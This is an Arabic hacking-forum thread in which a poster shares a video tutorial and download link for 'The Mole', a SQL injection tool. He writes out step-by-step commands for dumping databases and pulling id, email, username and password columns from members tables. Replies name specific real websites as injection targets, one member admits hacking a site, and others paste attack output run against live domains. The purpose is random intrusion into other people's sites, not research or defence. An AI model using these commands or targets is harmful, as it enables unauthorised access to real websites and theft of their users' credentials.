لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع :)

[Q2-ksa]

السلام عليكم ورحمة الله وبركاته..

اتمنى تكونون بخير ..ومبروك عليكم العيد جميعاً

هذا اليوم قمت بعمل شرح لاداة
mole

لأن الكثيرمنكم لا تعمل معه الاداة حسب شرح موقع الشركة لها ..
وهذا الشرح الفيديو العربي هو الأول مع التطبيق على موقع من بداية تحميل الاداة :14:
الى أن نقوم بالدخول على لوحة الادمن :clap:

طبعاً الاداة خاصة بالحقن ..
واداة قوية صراحه .. ورهيبة ..

ان شاء الله الشرح واضح جداً ..
واي استفسار انا حاضر ..

((بالنسبة لـ الموقع عليكم بالعافية )) :msn-wink:

للتحميل :

mediafire.com/?m451sck8midyow9
​

انسخوه وضعوه بالمتصفحح ..
لاني ممنوع من وضع الروابط لان مشاركاتي لم تتعدى الـ 5..:no:

او حمّلوا المذكرة المرفقة بالموضوع .. وضعت داخلها الرابط تبع التحميل..


ملاحظة مهمة :
عند اعطاء امر

query
واختيار الاعمدة الخاصة بالبيانات المطلوبة
نفرض انه مثلاً اعطينا الامر بهالطريقة

query ogunch_dbsbs_members id,email,username,password
واعطينا انتر ..
وطلع لنا جدول فاضي !!
نقوم بتكرار الامر لكن باختيار عمود واحد مثلاً هكذا

query ogunch_dbsbs_members id
اخترنا فقط الـ id
سيظهر لنا ارقام الاي دي ..
لكن بعدها نقوم بنكرر الامر مع اختيار الاعمده كلها
الباسوورد والايميل واليوزر نيم والـ اي دي
لانه احياناً يحصل تعليق بسيط ..
وهالكلام قليل يحصل ..
بس حبيت انوّه ع هالشيء ع اساس اكون وضّحت لكم الموضوع بصورة جيده..



مع تحياتي
اخوكم
Q2 - ksa
:wink:


Scanned By GHOST HACK

​

 

[Q2-ksa]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

مرحباً ..
عفواً نسيت احط لكم موقع لاخواننا المبتدئين .. لاظهار مسارات الدخول..
مع ان فيه عدة طرق لاستخراج المسارات ..

y-shahinzadeh.ir/af/index.php


انسخوه لـ المتصفح ..

​

 

[aircrack -ng]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

يعطيك العافيه

ولا واحد يحمل حتى يتم الفحص

 

[!.!]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

شكرا لك اخوي جاري التحميل والفحص ...ان شاء الله يكون سالم معافا ان شاء الله يارب..
جزاك الله خيرا عنا وعنك يا حبيبي

 

[Q2-ksa]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

يعطيك العافيه

ولا واحد يحمل حتى يتم الفحص

الله يعافيك اخوي ..

انا أضم صوتي لـ صوتك .. ( لا احد يحمل حتى يتم الفحص )..:14:
انا أعلم ان هذا القرار ليس إقلال من الثقة بي .. لكن هو من حق الجميع ..:smile:

 

[محمد50]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

حلو العملك وتقديم الموضوعك
لاكن افضل الاخترقات
الاخترق المستهدف عبر (((الوندوز او عبر الانضمه الاخر ))) الانضمه الاخر افضل من الوندوز
وشكنر على التقديم
باااااااااااااااااااااااااااااي
كان معك
محمد50

 

[!.!]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

الله يعافيك اخوي ..

انا أضم صوتي لـ صوتك .. ( لا احد يحمل حتى يتم الفحص )..:14:
انا أعلم ان هذا القرار ليس إقلال من الثقة بي .. لكن هو من حق الجميع ..:smile:

+1000
الملف مفحوص ان شاء الله مافيه شئ حملو لا تخافو
:bleh:
​

 

[محمد50]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

+ لك تقيم على الموضوعك
باااااااااااااااااااااااااااااااي

 

[محمد50]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

التقيم
الموضوعك
((("جيد")))

 

[Q2-ksa]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

حلو العملك وتقديم الموضوعك
لاكن افضل الاخترقات
الاخترق المستهدف عبر (((الوندوز او عبر الانضمه الاخر ))) الانضمه الاخر افضل من الوندوز
وشكنر على التقديم
باااااااااااااااااااااااااااااي
كان معك
محمد50

اهلاً يامحمد ..
الحلو وجودك ..
عندما تريد استهداف موقع .. سـ تلجأ لعدة طرق .. لكن الهدف واحد ..الهدف هو الاختراق ..
وثغرات الـ sql تجدي نفعاً مع الاستهداف ..
و الاختراق العشوائي ممتع لمن يريدون ممارسة الاختراق بشكل عام .. او عمل بعض الشروحات على الشل او على تخطيات الحماية او ع اي هدف قائم لاجل الاختراق ..

بالنسبة لكلامك (عن الانظمة الاخرى) ..
المسألة مسألة خبرة .. وممارسة..
نظام الويندوز في يد (المبرمج) افضل من اللينكس في يد (متوسط الخبرة)..
وعلى فكرة .. الاداة التي قمت بشرحها تعمل على (لينكس وماك وويندوز) ..
ولا يوجد في الانترنت شرح فيديو واضح مثل ماشرحت انا .. الا شرح واحد من الشركة المصنعه للاداة وشرح غير واضح..
فـ نظراً لكثرة طلبات شرح الاداة في عدة مواقع قمت بـ عمل هذا الشرح..
ولم انزل هذا الموضوع الا هنا وفي منتدى صديق لي ..

تمنياتي للجميع بالتوفيق ..

 

[!.!]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

والله في حياتي ما شفت شئ فعال مثل هاذي الاداة
اخوي لو تكرم وتحط لنا الاوامر
لكي يكون موضوعك كامل ان شاء الله اليك احر التهاني اليك يا غالي

 

[aircrack -ng]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

حلو العملك وتقديم الموضوعك
لاكن افضل الاخترقات
الاخترق المستهدف عبر (((الوندوز او عبر الانضمه الاخر ))) الانضمه الاخر افضل من الوندوز
وشكنر على التقديم
باااااااااااااااااااااااااااااي
كان معك
محمد50

انا اشرحلك
الوندوز او اللينكس كل الطرق تاذي الى روما
الوندوز فيه ادوات تشتغل بس على الوندوز ومش موجوده في اللينكس
واللينكس فيه ادوات مش موجوده في الوندوز وتشتغل ع اللينكس
وانا استعمل الوندوز ومركب الباك تراك على نظام وهمي ولما بدي اجرب لدي كلا النظامين


عذرا صاحب الموضوع خرجت عن سياق الموضوع

 

[Q2-ksa]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

والله في حياتي ما شفت شئ فعال مثل هاذي الاداة
اخوي لو تكرم وتحط لنا الاوامر
لكي يكون موضوعك كامل ان شاء الله اليك احر التهاني اليك يا غالي

تأمر امر ياغالي ..

الاوامر واضحه في الشرح الفيديو .. لكن يالله ماعليه لعيونكم اضع لكم الاوامر بشكل سريع ..
طبعاً المجلد تبع الاداه فيه ملف exe هذا الاصدار خاص بالويندوز ..وهو الي راح نشغله بامر الدوس ..

بعد نقل الاداة لـ السي نقوم بفتح الدوس والانتقال بالمحرر لـ مسار السي وننتقل ايضاً بالمحرر الى مجلد الاداة .. ونقوم باعطاء هذا الامر
mole.exe -u wwwxxxxxxx.com/index.phpphp?id=3 -n 'schemas'

تشتغل الاداه نعطي الامر
needle schemas

ثم
schemas


راح تطلع الداتا بيس..

tables
ثم مسافه ثم اسم الداتا وانتر .. تظهر الاعمده ..
و
columns
ثم مسافه ثم اسم الداتا بيس وثم مسافة ثم اسم الجدول المطلوب ..وانتر

ثم تظهر لنا الاعمده ..

query
هذا الامر الاخير .. نكتب بعده اسم الداتا بيس التي تم اختيارها مسبقاً ثم مسافة و اسم الجدول ومسافة واسم الاعمده المطلوبه بياناتها مثال
query ogunch_db sbs_members id,email,username,password


في المثال الاعلى :
ogunch_db هذا اسم الداتا تبع الموقع..
sbs_members اسم الجدول
وهذه اسماء الاعمده :
id,email,username,password
طبعاً لازم نضع فاصلة بين كل اسم عمود وعمود اخر ..

وهكذا .. الى نهاية الموضوع..


شرحها واضح جداً ولو بغيتوا ارفعها ع اليوتيوب ماعندي مشكلة ياقماعة..
​

 

[!.!]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

هه صحيت خويا ربي يجازيك ويرفع عنك ان شاء الله لكن انا عملت مثل ماعامل انت بالظبط وظهرت مشكلة وهي
​

#> needle schemas
#> schemas
[-] Could not detect SQL Injection: Needle not found (Needle not in page)

#>​

لم يجد جداول دتا بيز وانا لسع في الطريقة الاولة وان شاء الله نكون ماازعجتك وانا اسف جدا على هذا الصراحت اعجبني الاداة والشرح ربي يعطيك ماتتمنا ان شاء الله
جربتو على ثلاث مواقع لذا شوف هاذو المواقع مصابين بثغرة sql لكن نفس المشكلة شوف
www.cam-ceeds.org/event.php?ID=30
http://valleyviewcasinocenter.com/event.php?id=202
​

 

[Q2-ksa]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

هه صحيت خويا ربي يجازيك ويرفع عنك ان شاء الله لكن انا عملت مثل ماعامل انت بالظبط وظهرت مشكلة وهي
​

لم يجد جداول دتا بيز وانا لسع في الطريقة الاولة وان شاء الله نكون ماازعجتك وانا اسف جدا على هذا الصراحت اعجبني الاداة والشرح ربي يعطيك ماتتمنا ان شاء الله
جربتو على ثلاث مواقع لذا شوف هاذو المواقع مصابين بثغرة sql لكن نفس المشكلة شوف
www.cam-ceeds.org/event.php?ID=30
http://valleyviewcasinocenter.com/event.php?id=202
[/CENTER]

حمل المذكرة .. المرفقه في ردي هذا ..

 

[PM2CL]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

لدي موق أخترقته ب sql صابقا والثغرة شغالة
لاكن عندما أجرب الاداة لاتشتغل

C:\themole-0.2.6>mole.exe -u http://apos.co.in/bulletindisplay.php?bulletin=5 -n
'shcemas'
_____ _ ___ ___ _
|_ _| | | \/ | | |
| | | |__ ___ | . . | ___ | | ___
| | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
| | | | | | __/ | | | | (_) | | __/
\_/ |_| |_|\___| \_| |_/\___/|_|\___|

Developed by Nasel(http://www.nasel.com.ar).
Published under GPLv3.
Be efficient and have fun!

#> needle schemas
#> schemas
[-] Could not detect SQL Injection: Needle not found (Needle not in page)
#>

 

[GHOST HACKERS]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

موفق اخي ..............

 

[Q2-ksa]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

لدي موق أخترقته ب sql صابقا والثغرة شغالة
لاكن عندما أجرب الاداة لاتشتغل

C:\themole-0.2.6>mole.exe -u http://apos.co.in/bulletindisplay.php?bulletin=5 -n
'shcemas'
_____ _ ___ ___ _
|_ _| | | \/ | | |
| | | |__ ___ | . . | ___ | | ___
| | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
| | | | | | __/ | | | | (_) | | __/
\_/ |_| |_|\___| \_| |_/\___/|_|\___|

Developed by Nasel(http://www.nasel.com.ar).
Published under GPLv3.
Be efficient and have fun!

#> needle schemas
#> schemas
[-] Could not detect SQL Injection: Needle not found (Needle not in page)
#>

اهلاً ياصديقي ..
ليش انت زعلان

تفضل هذه صورة للحقن تبع موقعك ..

المره الاخرى عط الامر
needle user
schemas user

 

[Q2-ksa]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

لا احد يجي يقول الأداه ما أشتغلت ..
عطوا الأوامر اللي انا عطيتها في الشرح مبدأياً ..
واذا واجهتوا مشكلة عطوا الاوامر اللي انا شرحتها للأعضاء اللي واجهوا مشكلة..



موفقين خير باذن الله ..
​

 

[ViRuS Qalaa]

رد: لأول مره مرّه في المنتديات العربية شرحي فيديو لاداة (mole) لحقن المواقع

تسلم حبيبي ع الشرح الرائع
بارك الله فيك ..,